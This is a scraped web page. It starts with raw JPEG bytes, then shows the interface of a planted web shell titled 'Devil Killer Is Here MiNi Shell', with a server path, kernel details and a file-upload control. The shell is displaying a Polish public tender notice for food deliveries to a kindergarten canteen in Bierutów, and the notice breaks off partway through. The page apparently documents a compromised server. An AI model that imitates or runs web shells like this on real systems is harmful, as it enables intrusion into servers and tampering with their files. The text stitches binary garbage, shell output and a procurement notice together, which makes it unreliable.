JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251118/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251118/0053751401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów żywnościowych dla stołówki Przedszkola Miejskiego w Bierutowie w roku 2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH W BIERUTOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365866610</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bierutów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">725510377</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@bierutow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cuwbierutow.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów żywnościowych dla stołówki Przedszkola Miejskiego w Bierutowie w roku 2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cd14d215-776a-4971-b5e0-706cbe4880f5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00537514</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00390340/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Sukcesywna dostawa artykułów żywnościowych dla stołówki Przedszkola Miejskiego w Bierutowie w roku 2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cd14d215-776a-4971-b5e0-706cbe4880f5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl .<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-cd14d215-776a-4971-b5e0-706cbe4880f5</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, dostępnej pod adresem https://ezamowienia.gov.pl. 2. Korzystanie z Platformy e-Zamówienia jest bezpłatne. 3. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. 4. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych oraz w rozporządzeniu Rady Ministrów w sprawie Krajowych Ram Interoperacyjności . 5. Oferta oraz wymagane oświadczenia muszą być opatrzone, pod rygorem nieważności, kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. 6. Komunikacja w postępowaniu (np. wnioski o wyjaśnienie, wezwania, zawiadomienia) odbywa się za pośrednictwem „Formularzy do komunikacji” dostępnych na Platformie. Maksymalny rozmiar plików przesyłanych tą drogą to 25 MB. 7. Informacje stanowiące tajemnicę przedsiębiorstwa należy przekazać w wydzielonym i odpowiednio oznaczonym pliku . 8. Minimalne wymagania techniczne dotyczące sprzętu i połączenia określa Regulamin Platformy e-Zamówienia. 9. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację przez Platformę, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: cuw@bierutow.pl (nie dotyczy składania ofert). 10. Za datę przekazania dokumentów przyjmuje się datę ich przekazania na Platformie e-Zamówienia .</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-cd14d215-776a-4971-b5e0-706cbe4880f5</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.1), dalej „RODO”, informuję, że:<br/><br/>Administratorem Pani/Pana danych osobowych jest Centrum Usług Wspólnych w Bierutowie, zlokalizowanego w Bierutowie przy ul. Kolejowej 7. 2. Inspektorem ochrony danych osobowych: w imieniu Centrum Usług Wspólnych w Bierutowie jest inspektor danych osobowych Marek Adamaszek, adres e-mail: abi@adametronics.pl <br/><br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym nr ZP/02/25 pn.: „Sukcesywna dostawa artykułów żywnościowych dla stołówki Przedszkola Miejskiego w Bierutowie w roku 2026” <br/><br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. 2024.1320), dalej „ustawa Pzp”, w tym w oparciu o art. 18, 74 i 81 ustawy Pzp; 5. Pani/Pana dane osobowe będą przechowywane, przez okres zgodny z obowiązującymi przepisami prawa, w tym Rozporządzenie Prezesa Rady Ministrów z dnia 18 stycznia 2011r w sprawie Instrukcji Kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz.U.2020.164). 6. Obowiązek podania przez Panią/ Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/><br/><br/><br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/><br/>Posiada Pani/Pan:<br/>-na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani /Pana dotyczących<br/>-na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>-na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>Nie przysługuje Pani/Panu:<br/><br/>w związku z art. 17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/><br/>prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/><br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. C RODO. <br/><br/>Jednocześnie informuję się, że na Panu/Pani spoczywa obowiązek wypełnienia wszystkich obowiązków formalno-prawnych związanych z realizacją obowiązujących przepisów dotyczących ochrony danych osobowych. Do obowiązków tych należą m.in. obowiązki wynikające z rozporządzenia RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Pan/Pani bezpośrednio pozyska. Ponadto spoczywające na Pani/Panu obowiązki dotyczą także obowiązków informacyjnych wynikających z art.14 rozporządzenia RODO względem osób fizycznych, których dane zostają przekazane Zamawiającemu, w szczególności na podstawie art. 143e ustawy PZP i których dane pośrednio Pani/ Pan pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/><br/>-w związku z art. 17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/><br/>-prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO; <br/><br/>-na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. C RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/02/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – szczegółowy asortyment znajduję się w załączniku nr 3.1 do SWZ<br/><br/>Nazwa zamówienia: pieczywo świeże, wyroby piekarskie i ciastkarskie <br/><br/>Krótki opis przedmiotu zamówienia:<br/><br/>Wymagania: <br/>Pieczywo świeże, chrupiące niegumiaste, nie więcej niż 0,45 g sodu/ 1 g soli w 100 g/ml produktu gotowego do spożycia, pieczywo półcukiernicze i cukiernicze nie więcej niż 0,45 g sodu/1,2g soli w 100 g/ml produktu gotowego do spożycia w ilościach i jakości wskazanej w opisie przedmiotu zamówienia stanowiący załącznik nr 3.1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach (ocena oferty będzie dokonywana dla każdej części osobno).<br/><br/>Kryteria oceny ofert i ich waga:<br/><br/>Cena brutto (C) – Waga: 60% (60 punktów)<br/><br/>Czas reakcji (R) – Waga: 40% (40 punktów)<br/><br/>Sposób oceny kryterium &#34;Cena brutto&#34; (C): Punkty zostaną obliczone według wzoru: C = (Cena brutto najtańszej oferty / Cena brutto badanej oferty) x 60 pkt<br/><br/>Sposób oceny kryterium &#34;Czas reakcji&#34; (R): Punkty zostaną przyznane za zadeklarowany czas reakcji (termin dostawy artykułów właściwych w przypadku dostarczenia towaru wadliwego, niezgodnego z zamówieniem), liczony od czasu zgłoszenia wady przez Zamawiającego:<br/><br/>40 punktów - dostarczanie właściwych artykułów w czasie do 1 godziny włącznie od zgłoszenia.<br/><br/>30 punktów - dostarczanie właściwych artykułów w czasie powyżej 1 godziny do 2 godzin włącznie od zgłoszenia.<br/><br/>20 punktów - dostarczanie właściwych artykułów w czasie powyżej 2 godziny do 3 godzin włącznie od zgłoszenia.<br/><br/>0 punktów - dostarczanie właściwych artykułów w czasie powyżej 3 godzin do 4 godzin włącznie od zgłoszenia.<br/><br/>Zasady dodatkowe dla kryterium &#34;Czas reakcji&#34;: * Deklarowany czas reakcji musi być wskazany w pełnych godzinach. * Jeśli Wykonawca zadeklaruje czas w niepełnych godzinach, Zamawiający zaokrągli go do kolejno wyższej pełnej godziny. <br/><br/>W przypadku niezłożenia oświadczenia o czasie reakcji (braku wpisu w formularzu ofertowym), oferta otrzyma 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas reakcji, tj. 4 godziny. * W przypadku zaoferowania czasu reakcji dłuższego niż maksymalny (4 godziny), oferta zostanie odrzucona. <br/><br/>Obliczenie końcowej liczby punktów (S): Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: S = C + R<br/><br/>Rozstrzyganie w przypadku ofert z taką samą liczbą punktów: * Jeżeli nie można wybrać najkorzystniejszej oferty, ponieważ dwie lub więcej ofert przedstawia taki sam bilans punktów (S), Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (tj. w kryterium &#34;Cena brutto&#34;). * Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. * Jeżeli nie można dokonać wyboru oferty (np. ceny są identyczne), Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – szczegółowy asortyment znajduję się w załączniku nr 3.2 do SWZ<br/><br/>Nazwa zamówienia: warzywa i owoce świeże, kiszonki,<br/><br/>Wymagania: <br/>owoce i warzywa świeże, nienadmarznięte, bez uszkodzeń mechanicznych, bez oznak pleśni, o dobrym smaku bez zanieczyszczeń fizycznych, oznak i pozostałości szkodników, bez zanieczyszczeń biologicznych oraz bakterii chorobotwórczych, w kolorze naturalnym dla danego asortymentu, wysokiej jakości 1 gatunku bez wad fizycznych i jakościowych w ilościach i jakości wskazanej w opisie przedmiotu zamówienia stanowiący załącznik nr 3.2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach (ocena oferty będzie dokonywana dla każdej części osobno).<br/><br/>Kryteria oceny ofert i ich waga:<br/><br/>Cena brutto (C) – Waga: 60% (60 punktów)<br/><br/>Czas reakcji (R) – Waga: 40% (40 punktów)<br/><br/>Sposób oceny kryterium &#34;Cena brutto&#34; (C): Punkty zostaną obliczone według wzoru: C = (Cena brutto najtańszej oferty / Cena brutto badanej oferty) x 60 pkt<br/><br/>Sposób oceny kryterium &#34;Czas reakcji&#34; (R): Punkty zostaną przyznane za zadeklarowany czas reakcji (termin dostawy artykułów właściwych w przypadku dostarczenia towaru wadliwego, niezgodnego z zamówieniem), liczony od czasu zgłoszenia wady przez Zamawiającego:<br/><br/>40 punktów - dostarczanie właściwych artykułów w czasie do 1 godziny włącznie od zgłoszenia.<br/><br/>30 punktów - dostarczanie właściwych artykułów w czasie powyżej 1 godziny do 2 godzin włącznie od zgłoszenia.<br/><br/>20 punktów - dostarczanie właściwych artykułów w czasie powyżej 2 godziny do 3 godzin włącznie od zgłoszenia.<br/><br/>0 punktów - dostarczanie właściwych artykułów w czasie powyżej 3 godzin do 4 godzin włącznie od zgłoszenia.<br/><br/>Zasady dodatkowe dla kryterium &#34;Czas reakcji&#34;: * Deklarowany czas reakcji musi być wskazany w pełnych godzinach. * Jeśli Wykonawca zadeklaruje czas w niepełnych godzinach, Zamawiający zaokrągli go do kolejno wyższej pełnej godziny. <br/><br/>W przypadku niezłożenia oświadczenia o czasie reakcji (braku wpisu w formularzu ofertowym), oferta otrzyma 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas reakcji, tj. 4 godziny. * W przypadku zaoferowania czasu reakcji dłuższego niż maksymalny (4 godziny), oferta zostanie odrzucona. <br/><br/>Obliczenie końcowej liczby punktów (S): Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: S = C + R<br/><br/>Rozstrzyganie w przypadku ofert z taką samą liczbą punktów: * Jeżeli nie można wybrać najkorzystniejszej oferty, ponieważ dwie lub więcej ofert przedstawia taki sam bilans punktów (S), Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (tj. w kryterium &#34;Cena brutto&#34;). * Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. * Jeżeli nie można dokonać wyboru oferty (np. ceny są identyczne), Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – szczegółowy asortyment znajduję się w załączniku nr 3.3 do SWZ<br/><br/>Nazwa zamówienia: Produkty zwierzęce, mięso i produkty mięsne<br/><br/>Krótki opis przedmiotu 